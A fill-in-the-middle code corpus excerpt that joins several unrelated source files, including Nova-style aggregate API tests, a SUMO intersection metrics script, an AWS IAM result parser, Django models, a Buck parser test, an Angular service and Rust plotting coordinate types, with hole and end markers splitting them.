raise exception.ComputeHostNotFound(host=host)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1", body={"remove_host": {"host": "bogushost"}})
def test_remove_host_with_missing_host(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"asdf": "asdf"})
def test_remove_host_with_extra_param(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"remove_host": {"asdf": "asdf",
"host": "asdf"}})
def test_set_metadata(self):
body = {"set_metadata": {"metadata": {"foo": "bar"}}}
def stub_update_aggregate(context, aggregate, values):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertThat(body["set_metadata"]['metadata'],
matchers.DictMatches(values))
return AGGREGATE
self.stubs.Set(self.controller.api,
"update_aggregate_metadata",
stub_update_aggregate)
result = self.controller.action(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_set_metadata_with_bad_aggregate(self):
body = {"set_metadata": {"metadata": {"foo": "bar"}}}
def stub_update_aggregate(context, aggregate, metadata):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api,
"update_aggregate_metadata",
stub_update_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bad_aggregate", body=body)
def test_set_metadata_with_missing_metadata(self):
body = {"asdf": {"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body=body)
def test_set_metadata_with_extra_params(self):
body = {"metadata": {"foo": "bar"}, "asdf": {"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body=body)
def test_delete_aggregate(self):
def stub_delete_aggregate(context, aggregate):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
stub_delete_aggregate.called = True
self.stubs.Set(self.controller.api, "delete_aggregate",
stub_delete_aggregate)
self.controller.delete(self.req, "1")
self.assertTrue(stub_delete_aggregate.called)
def test_delete_aggregate_with_bad_aggregate(self):
def stub_delete_aggregate(context, aggregate):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api, "delete_aggregate",
stub_delete_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.delete,
self.req, "bogus_aggregate")<|fim▁end|> |
def test_add_host_with_missing_host(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"add_host": {"asdf": "asdf"}}) |
<|file_name|>generateITetrisIntersectionMetrics.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
@file generateITetrisIntersectionMetrics.py
@author Daniel Krajzewicz
@author Lena Kalleske
@author Michael Behrisch
@date 2007-10-25
@version $Id: generateITetrisIntersectionMetrics.py 14425 2013-08-16 20:11:47Z behrisch $
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
from optparse import OptionParser
import os, sys
from numpy import mean
from xml.sax import parse, handler
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import sumolib.net
def getBasicStats(net, lanesInfo, T):
tlsInfo = {}
for tl in net._tlss:
tlID = tl._id
mQueueLen = []
# mWaitTime = []
nbStops = []
tWaitTime = []
seenLanes = set()
for conn in tl._connections:
lane = conn[0]
if lane in seenLanes:
continue
seenLanes.add(lane)
mQueueLenInfo = sum(lanesInfo[lane.getID()]['mQueueLen'])
mQueueLen.append(mQueueLenInfo)
# mWaitTimeInfo = mean(lanesInfo[lane.getID()]['mWaitTime'])
# mWaitTime.append(mWaitTimeInfo)
nbStopsInfo = sum(lanesInfo[lane.getID()]['nbStops'])
nbStops.append(nbStopsInfo)
tWaitTimeInfo = sum(lanesInfo[lane.getID()]['tWaitTime'])
tWaitTime.append(tWaitTimeInfo)
tlsInfo[tlID] = {}
tlsInfo[tlID]['mQueueLen'] = mean(mQueueLen) / T
tlsInfo[tlID]['mWaitTime'] = mean(tWaitTime) / T
tlsInfo[tlID]['nbStops'] = sum(nbStops)
tlsInfo[tlID]['tWaitTime'] = sum(tWaitTime)
return tlsInfo
def mergeInfos(tlsInfoAll, tlsInfoOne, metric):
for tl in tlsInfoOne.keys():
tlsInfoAll[tl][metric] = tlsInfoOne[tl]
def getStatisticsOutput(tlsInfo, outputfile):
opfile = file(outputfile, 'w')
for tl in tlsInfo.keys():
opfile.write('Traffic Light %s\n' % tl)
opfile.write('=================\n')
opfile.write('mean queue length in front of the junction: %s\n' % tlsInfo[tl]['mQueueLen'])
opfile.write('mean waiting time in front of the junction: %s\n' % tlsInfo[tl]['mWaitTime'])
if 'noise' in tlsInfo[tl]:<|fim▁hole|> opfile.write('mean CO emission: %s\n' % tlsInfo[tl]['CO'])
opfile.write('mean CO2 emission: %s\n' % tlsInfo[tl]['CO2'])
opfile.write('mean HC emission: %s\n' % tlsInfo[tl]['HC'])
opfile.write('mean PMx emission: %s\n' % tlsInfo[tl]['PMx'])
opfile.write('mean NOx emission: %s\n' % tlsInfo[tl]['NOx'])
opfile.write('mean fuel consumption: %s\n' % tlsInfo[tl]['fuel'])
opfile.write('number of stops: %s\n' % tlsInfo[tl]['nbStops'])
opfile.write('total waiting time at junction: %s\n\n' % tlsInfo[tl]['tWaitTime'])
def tlsIDToNodeID(net):
tlsID2NodeID = {}
for tls in net._tlss:
tlsID = tls._id
tlsID2NodeID[tlsID] = []
seenNodes = set()
for conn in tls._connections:
lane = conn[0]
edge = lane._edge
node = edge._to
nodeID = node._id
if nodeID not in seenNodes:
tlsID2NodeID[tlsID].append(nodeID)
seenNodes.add(nodeID)
return tlsID2NodeID
class E2OutputReader(handler.ContentHandler):
def __init__(self):
self._lanes = {}
self._maxT = 0
def startElement(self, name, attrs):
if name == 'interval':
detID = attrs['id']
laneID = detID[6:len(detID)]
if not self._lanes.has_key(laneID):
self._lanes[laneID] = {}
self._lanes[laneID]['mQueueLen'] = []
# self._lanes[laneID]['mWaitTime'] = []
self._lanes[laneID]['nbStops'] = []
self._lanes[laneID]['tWaitTime'] = []
if float(attrs['end']) < 100000000:
self._lanes[laneID]['mQueueLen'].append(float(attrs['jamLengthInMetersSum']))
# self._lanes[laneID]['mWaitTime'].append(float(attrs['meanHaltingDuration']))
self._lanes[laneID]['nbStops'].append(float(attrs['startedHalts']))
self._lanes[laneID]['tWaitTime'].append(float(attrs['haltingDurationSum']))
self._maxT = max(float(attrs['end']), self._maxT)
class HarmonoiseReader(handler.ContentHandler):
def __init__(self, net, tlsID2NodeID):
self._nodeIntervalNoise = {}
self._maxT = 0
self._net = net
self._tlsNoise = {}
self._tlsID2NodeID = tlsID2NodeID
def startElement(self, name, attrs):
if name == 'interval':
self._maxT = max(float(attrs['end']), self._maxT)
if name == 'edge':
edgeID = attrs['id']
noiseStr = attrs['noise']
if len(noiseStr) < 10:
noise = float(noiseStr)
else:
noise = 0
if edgeID[0]==':':
nodeID = edgeID[1:edgeID.find('_')]
if nodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[nodeID] = []
self._nodeIntervalNoise[nodeID].append(noise)
else:
fromNodeID = net.getEdge(edgeID)._from._id
if fromNodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[fromNodeID] = []
self._nodeIntervalNoise[fromNodeID].append(noise)
toNodeID = net.getEdge(edgeID)._to._id
if toNodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[toNodeID] = []
self._nodeIntervalNoise[toNodeID].append(noise)
def endElement(self, name):
if name == 'interval':
self.sumIntervalNoise()
if name == 'netstats':
self.sumNoise()
def sumIntervalNoise(self):
for tls in net._tlss:
sum = 0
tlsID = tls._id
if tlsID not in self._tlsNoise:
self._tlsNoise[tlsID] = []
for nodeID in self._tlsID2NodeID[tlsID]:
for noise in self._nodeIntervalNoise[nodeID]:
sum = sum + pow(10, noise/10)
self._tlsNoise[tlsID].append(10 * log(sum)/log(10))
def sumNoise(self):
for tls in net._tlss:
tlsID = tls._id
self._tlsNoise[tlsID] = sum(self._tlsNoise[tlsID]) / self._maxT
class HBEFAReader(handler.ContentHandler):
def __init__(self, net, tlsID2NodeID):
self._maxT = 0
self._net = net
self._nodeIntervalCO = {}
self._nodeIntervalCO2 = {}
self._nodeIntervalHC = {}
self._nodeIntervalPMx = {}
self._nodeIntervalNOx = {}
self._nodeIntervalfuel = {}
self._tlsCO = {}
self._tlsCO2 = {}
self._tlsHC = {}
self._tlsPMx = {}
self._tlsNOx = {}
self._tlsfuel = {}
self._tlsID2NodeID = tlsID2NodeID
def startElement(self, name, attrs):
if name == 'interval':
self._maxT = max(float(attrs['end']), self._maxT)
if name == 'edge':
edgeID = attrs['id']
CO = float(attrs['CO_perVeh'])
CO2 = float(attrs['CO2_perVeh'])
HC = float(attrs['HC_perVeh'])
PMx = float(attrs['PMx_perVeh'])
NOx = float(attrs['NOx_perVeh'])
fuel = float(attrs['fuel_perVeh'])
if edgeID[0]==':':
nodeIDs = edgeID[1:edgeID.find('_')]
else:
fromNodeID = net.getEdge(edgeID)._from._id
toNodeID = net.getEdge(edgeID)._to._id
nodeIDs = [fromNodeID, toNodeID]
for nodeID in nodeIDs:
if nodeID not in self._nodeIntervalCO:
self._nodeIntervalCO[nodeID] = []
self._nodeIntervalCO2[nodeID] = []
self._nodeIntervalHC[nodeID] = []
self._nodeIntervalPMx[nodeID] = []
self._nodeIntervalNOx[nodeID] = []
self._nodeIntervalfuel[nodeID] = []
self._nodeIntervalCO[nodeID].append(CO)
self._nodeIntervalCO2[nodeID].append(CO2)
self._nodeIntervalHC[nodeID].append(HC)
self._nodeIntervalPMx[nodeID].append(PMx)
self._nodeIntervalNOx[nodeID].append(NOx)
self._nodeIntervalfuel[nodeID].append(fuel)
def endElement(self, name):
if name == 'interval':
self.sumInterval()
if name == 'netstats':
self.sum()
def sumInterval(self):
for tls in net._tlss:
tlsID = tls._id
if tlsID not in self._tlsCO:
self._tlsCO[tlsID] = []
self._tlsCO2[tlsID] = []
self._tlsHC[tlsID] = []
self._tlsPMx[tlsID] = []
self._tlsNOx[tlsID] = []
self._tlsfuel[tlsID] = []
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalCO[nodeID]:
sum = sum + v
self._tlsCO[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalCO2[nodeID]:
sum = sum + v
self._tlsCO2[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalHC[nodeID]:
sum = sum + v
self._tlsHC[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalPMx[nodeID]:
sum = sum + v
self._tlsPMx[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalNOx[nodeID]:
sum = sum + v
self._tlsNOx[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalfuel[nodeID]:
sum = sum + v
self._tlsfuel[tlsID].append(sum)
def sum(self):
for tls in net._tlss:
tlsID = tls._id
self._tlsCO[tlsID] = sum(self._tlsCO[tlsID]) / self._maxT
self._tlsCO2[tlsID] = sum(self._tlsCO2[tlsID]) / self._maxT
self._tlsHC[tlsID] = sum(self._tlsHC[tlsID]) / self._maxT
self._tlsPMx[tlsID] = sum(self._tlsPMx[tlsID]) / self._maxT
self._tlsNOx[tlsID] = sum(self._tlsNOx[tlsID]) / self._maxT
self._tlsfuel[tlsID] = sum(self._tlsfuel[tlsID]) / self._maxT
# initialise
optParser = OptionParser()
optParser.add_option("-n", "--netfile", dest="netfile",
help="name of the netfile (f.e. 'inputs\\pasubio\\a_costa.net.xml')", metavar="<FILE>", type="string")
optParser.add_option("-p", "--path", dest="path",
help="name of folder to work with (f.e. 'inputs\\a_costa\\')", metavar="<FOLDER>", type="string", default="./")
optParser.add_option("-o", "--harmonoiseFile", dest="harmonoiseFile",
help="name of the harmonoise file", metavar="<FOLDER>", type="string")
optParser.add_option("-e", "--HBEFAFile", dest="hbefaFile",
help="name of the HBEFA file", metavar="<FOLDER>", type="string")
optParser.set_usage('\n-n inputs\\pasubio\\pasubio.net.xml -p inputs\\pasubio\\')
# parse options
(options, args) = optParser.parse_args()
if not options.netfile:
print "Missing arguments"
optParser.print_help()
exit()
netfile = options.netfile
e2OutputFile = os.path.join(options.path, 'e2_output.xml')
net = sumolib.net.readNet(netfile)
e2Output = E2OutputReader()
parse(e2OutputFile, e2Output)
tlsID2NodeID = tlsIDToNodeID(net)
tlsInfo = getBasicStats(net, e2Output._lanes, e2Output._maxT)
if options.harmonoiseFile:
harmonoiseOutput = HarmonoiseReader(net, tlsID2NodeID)
parse(options.harmonoiseFile, harmonoiseOutput)
mergeInfos(tlsInfo, harmonoiseOutput._tlsNoise, 'noise')
if options.hbefaFile:
hbefaOutput = HBEFAReader(net, tlsID2NodeID)
parse(hbefaFile, hbefaOutput)
mergeInfos(tlsInfo, hbefaOutput._tlsCO, 'CO')
mergeInfos(tlsInfo, hbefaOutput._tlsCO2, 'CO2')
mergeInfos(tlsInfo, hbefaOutput._tlsHC, 'HC')
mergeInfos(tlsInfo, hbefaOutput._tlsPMx, 'PMx')
mergeInfos(tlsInfo, hbefaOutput._tlsNOx, 'NOx')
mergeInfos(tlsInfo, hbefaOutput._tlsfuel, 'fuel')
getStatisticsOutput(tlsInfo, os.path.join(options.path, "intersection_metrics_summary.txt"))
print 'The calculation is done!'<|fim▁end|> | opfile.write('mean noise emission: %s\n' % tlsInfo[tl]['noise'])
if 'CO' in tlsInfo[tl]: |
<|file_name|>ListServerCertificatesResult.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright 2010-2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/iam/model/ListServerCertificatesResult.h>
#include <aws/core/utils/xml/XmlSerializer.h>
#include <aws/core/AmazonWebServiceResult.h>
#include <aws/core/utils/StringUtils.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <utility>
using namespace Aws::IAM::Model;
using namespace Aws::Utils::Xml;
using namespace Aws::Utils::Logging;
using namespace Aws::Utils;
using namespace Aws;
ListServerCertificatesResult::ListServerCertificatesResult() :
m_isTruncated(false)
{
}
ListServerCertificatesResult::ListServerCertificatesResult(const AmazonWebServiceResult<XmlDocument>& result) :
m_isTruncated(false)
{
*this = result;
}
ListServerCertificatesResult& ListServerCertificatesResult::operator =(const AmazonWebServiceResult<XmlDocument>& result)
{
const XmlDocument& xmlDocument = result.GetPayload();
XmlNode rootNode = xmlDocument.GetRootElement();
XmlNode resultNode = rootNode;
if (rootNode.GetName() != "ListServerCertificatesResult")
{
resultNode = rootNode.FirstChild("ListServerCertificatesResult");
}
if(!resultNode.IsNull())
{
XmlNode serverCertificateMetadataListNode = resultNode.FirstChild("ServerCertificateMetadataList");
if(!serverCertificateMetadataListNode.IsNull())
{
XmlNode serverCertificateMetadataListMember = serverCertificateMetadataListNode.FirstChild("member");
while(!serverCertificateMetadataListMember.IsNull())
{
m_serverCertificateMetadataList.push_back(serverCertificateMetadataListMember);
serverCertificateMetadataListMember = serverCertificateMetadataListMember.NextNode("member");
}<|fim▁hole|> }
XmlNode isTruncatedNode = resultNode.FirstChild("IsTruncated");
if(!isTruncatedNode.IsNull())
{
m_isTruncated = StringUtils::ConvertToBool(StringUtils::Trim(isTruncatedNode.GetText().c_str()).c_str());
}
XmlNode markerNode = resultNode.FirstChild("Marker");
if(!markerNode.IsNull())
{
m_marker = StringUtils::Trim(markerNode.GetText().c_str());
}
}
XmlNode responseMetadataNode = rootNode.FirstChild("ResponseMetadata");
m_responseMetadata = responseMetadataNode;
AWS_LOGSTREAM_DEBUG("Aws::IAM::Model::ListServerCertificatesResult", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() );
return *this;
}<|fim▁end|> | |
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models
from django_hstore import hstore
# Create your models here.
class Place(models.Model):
osm_type = models.CharField(max_length=1)
osm_id = models.IntegerField(primary_key=True)
class_field = models.TextField(db_column='class') # Field renamed because it was a Python reserved word.
type = models.TextField()
name = hstore.DictionaryField(blank=True) # This field type is a guess.
admin_level = models.IntegerField(null=True, blank=True)
housenumber = models.TextField(blank=True)
street = models.TextField(blank=True)
isin = models.TextField(blank=True)
postcode = models.TextField(blank=True)
country_code = models.CharField(max_length=2, blank=True)
extratags = models.TextField(blank=True) # This field type is a guess.
geometry = models.TextField() # This field type is a guess.
objects = hstore.HStoreManager()
class Meta :
managed = False
db_table= 'place'
unique_together = ('osm_id', 'class_field')
class Phonetique(models.Model):
nom = models.TextField()
#osm_id = models.IntegerField()
osm = models.ForeignKey(Place)
poids = models.IntegerField()
ville = models.CharField(max_length=200)
semantic = models.CharField(max_length=25)
class Meta :
managed = False
db_table ='phonetique'
def __unicode__(self):<|fim▁hole|><|fim▁end|> | return '%d, %s' % (self.poids, self.nom) |
<|file_name|>DefaultUnconfiguredTargetNodeFactoryTest.java<|end_file_name|><|fim▁begin|>/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.buck.parser;
import static org.junit.Assert.assertEquals;
import com.facebook.buck.core.cell.Cell;
import com.facebook.buck.core.cell.TestCellBuilder;
import com.facebook.buck.core.exceptions.DependencyStack;
import com.facebook.buck.core.model.ConfigurationBuildTargetFactoryForTests;
import com.facebook.buck.core.model.RuleType;
import com.facebook.buck.core.model.UnconfiguredBuildTargetFactoryForTests;
import com.facebook.buck.core.model.UnconfiguredBuildTargetView;
import com.facebook.buck.core.model.targetgraph.impl.Package;
import com.facebook.buck.core.model.targetgraph.raw.UnconfiguredTargetNode;
import com.facebook.buck.core.parser.buildtargetparser.ParsingUnconfiguredBuildTargetViewFactory;
import com.facebook.buck.core.plugin.impl.BuckPluginManagerFactory;
import com.facebook.buck.core.rules.knowntypes.TestKnownRuleTypesProvider;
import com.facebook.buck.core.rules.knowntypes.provider.KnownRuleTypesProvider;
import com.facebook.buck.core.select.Selector;
import com.facebook.buck.core.select.SelectorKey;
import com.facebook.buck.core.select.SelectorList;
import com.facebook.buck.core.select.impl.SelectorFactory;
import com.facebook.buck.core.select.impl.SelectorListFactory;
import com.facebook.buck.parser.api.ImmutablePackageMetadata;
import com.facebook.buck.parser.syntax.ImmutableListWithSelects;
import com.facebook.buck.parser.syntax.ImmutableSelectorValue;
import com.facebook.buck.rules.coercer.JsonTypeConcatenatingCoercerFactory;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import com.google.common.collect.Iterables;
import java.util.List;
import java.util.Optional;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
public class DefaultUnconfiguredTargetNodeFactoryTest {
private DefaultUnconfiguredTargetNodeFactory factory;
private Cell cell;
@Rule public ExpectedException thrown = ExpectedException.none();
@Before
public void setUp() {
KnownRuleTypesProvider knownRuleTypesProvider =
TestKnownRuleTypesProvider.create(BuckPluginManagerFactory.createPluginManager());
cell = new TestCellBuilder().build();
factory =
new DefaultUnconfiguredTargetNodeFactory(
knownRuleTypesProvider,
new BuiltTargetVerifier(),
cell.getCellPathResolver(),
new SelectorListFactory(
new SelectorFactory(new ParsingUnconfiguredBuildTargetViewFactory())));
}
@Test
public void testCreatePopulatesNode() {
UnconfiguredBuildTargetView buildTarget =
UnconfiguredBuildTargetFactoryForTests.newInstance("//a/b:c");
ImmutableMap<String, Object> inputAttributes =
ImmutableMap.<String, Object>builder()
.put("buck.type", "java_library")<|fim▁hole|> "resources",
ImmutableListWithSelects.of(
ImmutableList.of(
ImmutableSelectorValue.of(
ImmutableMap.of(
"//c:a",
ImmutableList.of("//a/b:file1", "//a/b:file2"),
"//c:b",
ImmutableList.of("//a/b:file3", "//a/b:file4")),
"")),
ImmutableList.class))
.put("visibility", ImmutableList.of("//a/..."))
.put("within_view", ImmutableList.of("//b/..."))
.build();
ImmutableMap<String, Object> expectAttributes =
ImmutableMap.<String, Object>builder()
.put("buck.type", "java_library")
.put("name", "c")
.put("buck.base_path", "a/b")
.put("deps", ImmutableList.of("//a/b:d", "//a/b:e"))
.put(
"resources",
new SelectorList<>(
JsonTypeConcatenatingCoercerFactory.createForType(List.class),
ImmutableList.of(
new Selector<>(
ImmutableMap.of(
new SelectorKey(
ConfigurationBuildTargetFactoryForTests.newInstance("//c:a")),
ImmutableList.of("//a/b:file1", "//a/b:file2"),
new SelectorKey(
ConfigurationBuildTargetFactoryForTests.newInstance("//c:b")),
ImmutableList.of("//a/b:file3", "//a/b:file4")),
ImmutableSet.of(),
""))))
.put("visibility", ImmutableList.of("//a/..."))
.put("within_view", ImmutableList.of("//b/..."))
.build();
UnconfiguredTargetNode unconfiguredTargetNode =
factory.create(
cell,
cell.getRoot().resolve("a/b/BUCK"),
buildTarget,
DependencyStack.root(),
inputAttributes,
getPackage());
assertEquals(
RuleType.of("java_library", RuleType.Kind.BUILD), unconfiguredTargetNode.getRuleType());
assertEquals(buildTarget.getData(), unconfiguredTargetNode.getBuildTarget());
assertEquals(expectAttributes, unconfiguredTargetNode.getAttributes());
assertEquals(
"//a/...",
Iterables.getFirst(unconfiguredTargetNode.getVisibilityPatterns(), null)
.getRepresentation());
assertEquals(
"//b/...",
Iterables.getFirst(unconfiguredTargetNode.getWithinViewPatterns(), null)
.getRepresentation());
}
Package getPackage() {
ImmutablePackageMetadata pkg =
ImmutablePackageMetadata.of(ImmutableList.of("//a/..."), ImmutableList.of("//d/..."));
return PackageFactory.create(cell, cell.getRoot().resolve("a/b/BUCK"), pkg, Optional.empty());
}
}<|fim▁end|> | .put("name", "c")
.put("buck.base_path", "a/b")
.put("deps", ImmutableList.of("//a/b:d", "//a/b:e"))
.put( |
<|file_name|>json-reference.service.ts<|end_file_name|><|fim▁begin|>import { Injectable } from '@angular/core';
@Injectable()
export class JsonReferenceService {
constructor() { }
dereference<T>(obj: any, $ref: string): T {
if(!$ref.startsWith('#/')) {
console.warn('Invalid $ref. Only references to current document supported.', $ref);
return null;
}
let parts = $ref.substr(2).split('/');
for(let i = 0; i < parts.length; i++) {
obj = obj[parts[i]];
if(obj === undefined) return null;
}
return <T>obj;
}<|fim▁hole|><|fim▁end|> | } |
<|file_name|>coords.rs<|end_file_name|><|fim▁begin|>//! Coordinate systems and geometry definitions. Some conversions are dependent on the application
//! state, and so those functions are a part of the `AppContext`.
use crate::app::config;
use metfor::{Celsius, CelsiusDiff, HectoPascal, Knots, Meters, PaPS, WindSpdDir};
/// Common operations on rectangles
pub trait Rect {
/// Get the minimum x coordinate
fn min_x(&self) -> f64;
/// Get the maximum x coordinate
fn max_x(&self) -> f64;
/// Get the minimum y coordinate
fn min_y(&self) -> f64;
/// Get the maximum y coordinate
fn max_y(&self) -> f64;
/// Check if two rectangles overlap
fn overlaps(&self, other: &Self) -> bool {
if self.min_x() > other.max_x() {
return false;
}
if self.max_x() < other.min_x() {
return false;
}
if self.min_y() > other.max_y() {
return false;
}
if self.max_y() < other.min_y() {
return false;
}
true
}
// Check if this rectangle is inside another.
fn inside(&self, big_rect: &Self) -> bool {
if self.min_x() < big_rect.min_x() {
return false;
}
if self.max_x() > big_rect.max_x() {
return false;
}
if self.min_y() < big_rect.min_y() {
return false;
}
if self.max_y() > big_rect.max_y() {
return false;
}
true
}
/// Get the width of this rectangle
fn width(&self) -> f64 {
self.max_x() - self.min_x()
}
/// Get the height of this rectangle
fn height(&self) -> f64 {
self.max_y() - self.min_y()
}
}
/***************************************************************************************************
* Temperature - Pressure Coordinates for Skew-T Log-P plot.
* ************************************************************************************************/
/// Temperature-Pressure coordinates.
/// Origin lower left. (Temperature, Pressure)
#[derive(Clone, Copy, Debug)]
pub struct TPCoords {
/// Temperature in Celsius
pub temperature: Celsius,
/// Pressure in hPa
pub pressure: HectoPascal,
}
/***************************************************************************************************
* Speed - Direction Coordinates for the Hodograph
* ************************************************************************************************/
/// Speed-Direction coordinates for the hodograph.
/// Origin center. (Speed, Direction wind is from)
#[derive(Clone, Copy, Debug)]
pub struct SDCoords {
/// Wind speed and direction.
pub spd_dir: WindSpdDir<Knots>,
}
/***************************************************************************************************
* Omega(W) - Pressure coords for the vertical velocity and RH plot
* ************************************************************************************************/
/// Omega-Pressure coordinates.
/// Origin lower left. (Omega, Pressure)
#[derive(Clone, Copy, Debug)]
pub struct WPCoords {
/// Omega in Pa/s
pub w: PaPS,
/// Pressure in hPa
pub p: HectoPascal,
}
/***************************************************************************************************
* Percent - Pressure coords for the Cloud Cover
* ************************************************************************************************/
/// Percent-Pressure coordinates.
#[derive(Clone, Copy, Debug)]
pub struct PPCoords {<|fim▁hole|> /// Percent 0.0 - 1.0
pub pcnt: f64,
/// Pressure in hPa
pub press: HectoPascal,
}
/***************************************************************************************************
* Speed - Pressure coords for the wind speed profile
* ************************************************************************************************/
/// Speed-Pressure coordinates.
#[derive(Clone, Copy, Debug)]
pub struct SPCoords {
/// Speed in knots
pub spd: Knots,
/// Pressure in hPa
pub press: HectoPascal,
}
/***************************************************************************************************
* △T - Height coords for the fire plume chart
* ************************************************************************************************/
/// DeltaT-Height coordinates.
#[derive(Clone, Copy, Debug)]
pub struct DtHCoords {
/// DeltaT in Celsius
pub dt: CelsiusDiff,
/// Height in meters
pub height: Meters,
}
/***************************************************************************************************
* △T - Percent coords for the percent wet cape chart.
* ************************************************************************************************/
/// DeltaT-Percent coordinates.
#[derive(Clone, Copy, Debug)]
pub struct DtPCoords {
/// DeltaT in Celsius
pub dt: CelsiusDiff,
/// Height in meters
pub percent: f64,
}
/***************************************************************************************************
* X - Y Coords for a default plot area that can be zoomed and panned
* ************************************************************************************************/
/// XY coordinates of the skew-t graph, range 0.0 to 1.0. This coordinate system is dependent on
/// settings for the maximum/minimum plottable pressure and temperatures in the config module.
/// Origin lower left, (x,y)
#[derive(Clone, Copy, Debug)]
pub struct XYCoords {
pub x: f64,
pub y: f64,
}
impl XYCoords {
pub fn origin() -> Self {
XYCoords { x: 0.0, y: 0.0 }
}
}
#[derive(Clone, Copy, Debug)]
pub struct XYRect {
pub lower_left: XYCoords,
pub upper_right: XYCoords,
}
impl Rect for XYRect {
fn min_x(&self) -> f64 {
self.lower_left.x
}
fn max_x(&self) -> f64 {
self.upper_right.x
}
fn min_y(&self) -> f64 {
self.lower_left.y
}
fn max_y(&self) -> f64 {
self.upper_right.y
}
}
/***************************************************************************************************
* Screen Coords - the coordinate system to actually draw in.
* ************************************************************************************************/
/// On screen coordinates. Meant to scale and translate `XYCoords` to fit on the screen.
/// Origin lower left, (x,y).
/// When drawing using cairo functions, use these coordinates.
#[derive(Clone, Copy, Debug)]
pub struct ScreenCoords {
pub x: f64,
pub y: f64,
}
impl ScreenCoords {
pub fn origin() -> Self {
ScreenCoords { x: 0.0, y: 0.0 }
}
}
#[derive(Clone, Copy, Debug)]
pub struct ScreenRect {
pub lower_left: ScreenCoords,
pub upper_right: ScreenCoords,
}
impl ScreenRect {
pub fn add_padding(&self, padding: f64) -> ScreenRect {
ScreenRect {
lower_left: ScreenCoords {
x: self.lower_left.x - padding,
y: self.lower_left.y - padding,
},
upper_right: ScreenCoords {
x: self.upper_right.x + padding,
y: self.upper_right.y + padding,
},
}
}
pub fn expand_to_fit(&mut self, point: ScreenCoords) {
let ScreenCoords { x, y } = point;
if x < self.lower_left.x {
self.lower_left.x = x;
}
if x > self.upper_right.x {
self.upper_right.x = x;
}
if y < self.lower_left.y {
self.lower_left.y = y;
}
if y > self.upper_right.y {
self.upper_right.y = y;
}
}
}
impl Rect for ScreenRect {
fn min_x(&self) -> f64 {
self.lower_left.x
}
fn max_x(&self) -> f64 {
self.upper_right.x
}
fn min_y(&self) -> f64 {
self.lower_left.y
}
fn max_y(&self) -> f64 {
self.upper_right.y
}
}
/***************************************************************************************************
* Device Coords - the coordinate system of the device
* ************************************************************************************************/
/// Device coordinates (pixels positions).
/// Origin upper left, (Column, Row)
#[derive(Clone, Copy, Debug, PartialEq)]
pub struct DeviceCoords {
pub col: f64,
pub row: f64,
}
impl From<(f64, f64)> for DeviceCoords {
fn from(src: (f64, f64)) -> Self {
DeviceCoords {
col: src.0,
row: src.1,
}
}
}
#[derive(Clone, Copy, Debug)]
pub struct DeviceRect {
pub upper_left: DeviceCoords,
pub width: f64,
pub height: f64,
}
impl Rect for DeviceRect {
fn min_x(&self) -> f64 {
self.upper_left.col
}
fn max_x(&self) -> f64 {
self.upper_left.col + self.width
}
fn min_y(&self) -> f64 {
self.upper_left.row
}
fn max_y(&self) -> f64 {
self.upper_left.row + self.height
}
}
/***************************************************************************************************
* Converting Pressure to the y coordinate
* ************************************************************************************************/
/// Given a pressure value, convert it to a y-value from X-Y coordinates.
///
/// Overwhelmingly the veritical coordinate system is based on pressure, so this is a very common
/// operation to do, and you want it to always be done them same.
